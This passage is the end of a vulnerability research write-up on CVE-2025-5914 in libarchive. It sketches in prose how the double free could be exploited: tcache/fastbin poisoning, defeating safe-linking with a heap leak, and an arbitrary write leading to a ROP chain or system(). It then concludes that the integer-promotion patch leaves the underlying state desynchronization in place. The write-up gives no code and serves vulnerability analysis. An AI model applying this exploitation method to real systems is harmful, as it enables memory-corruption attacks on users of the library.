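The Poisoning: The allocator now sees a circular link in its free list. We can then overwrite the next pointer of the freed chunk with an Arbitrary Address (e.g., the address of a Global Offset Table entry or a function pointer). Since glibc 2.32, tcache and fastbin next pointers are mangled by safe-linking, so this step additionally requires a heap address leak.
The Arbitrary Write: The subsequent malloc() call will return a pointer to our target address. Writing to this "Fake Chunk" allows us to redirect the execution flow to a ROP Chain or system().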

Conclusion: The Architecture of Failure

The investigation into CVE-2025-5914 reveals a profound truth in software security: Memory safety is a product of logical consistency, not just arithmetic bounds. While the initial discovery focused on an Integer Overflow, our deep-dive analysis has proven that the overflow was merely a "canary in the coal mine." The true vulnerability resides in the Ownership Mismatch between the decoupled layers of libarchive. The failure to synchronize the state between the format-specific parser and the core orchestration API created a Double Free primitive that remains a potent threat to system integrity.

Final Verdict on the Remediation
The official patch, which relies on Integer Promotion (moving to size_t), is a symptomatic treatment. It effectively raises the bar for triggering the vulnerability via the "4-billion nodes" path, but it leaves the underlying State Machine desynchronization intact. As long as the library maintains stale pointers in its error-handling routines, the risk of a Switch n-day exploitation remains high.

In the final analysis, CVE-2025-5914 serves as a stark reminder that as our systems scale, the "small" logical gaps in memory management become the "large" gateways for modern exploitation. The battle for security is won or lost in the Architecture, not just the variables.

Written by the Security Research Team – Bytrep, January 2026